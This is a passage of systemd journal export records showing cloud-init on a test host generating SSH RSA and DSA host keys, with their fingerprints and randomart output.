"cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private rsa key pair." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28c;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2d2b08f02c587437", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_rsa_key." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28d;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=81dee9f6fe1e28cd", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_rsa_key.pub." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28e;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=28f;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=27784decd912f835", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:yknRoTzFSZARXtHupUbaRHJq3cqluJqyPejk+7QaGXg root@test-1" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=290;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=291;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=673b6c2297980d5b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+---[RSA 2048]----+" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=292;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2d550c1613250691", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| +B*+ |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=293;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=c654081db1fa9273", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| o.=+.+ |" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=294;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=f53676ea4700ae3c", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| * .B . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=295;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=31ca3380fd6da014", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . 
oo = + |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=296;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=ce99318b887eb5d2", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . E ..SO * |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=297;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=10838fe541ff893b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . 
= oo O |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=298;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=c0e449122af7cdb4", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| +.= o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=299;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=55377504886d45e3", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| oo+.o. 
|" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29a;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=23834d86ee1d4954", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| .***o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29b;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29c;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d4bb71a15fccef51", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Generating public/private dsa key pair." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29d;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d0a88cda53bddb19", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your identification has been saved in /etc/ssh/ssh_host_dsa_key." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29e;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2a7073f3626f089b", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Your public key has been saved in /etc/ssh/ssh_host_dsa_key.pub." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=29f;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=2faa7d692a908da5", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key fingerprint is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a0;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=84c15c05befb1e39", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:Na+AYIqFXLqoKkXS4zW6wF1+NS6RxOOD/JsWTw2BofU root@test-1" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a1;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2a2;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=401634972dd94bba", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+---[DSA 1024]----+" } { "__CURSOR" : 
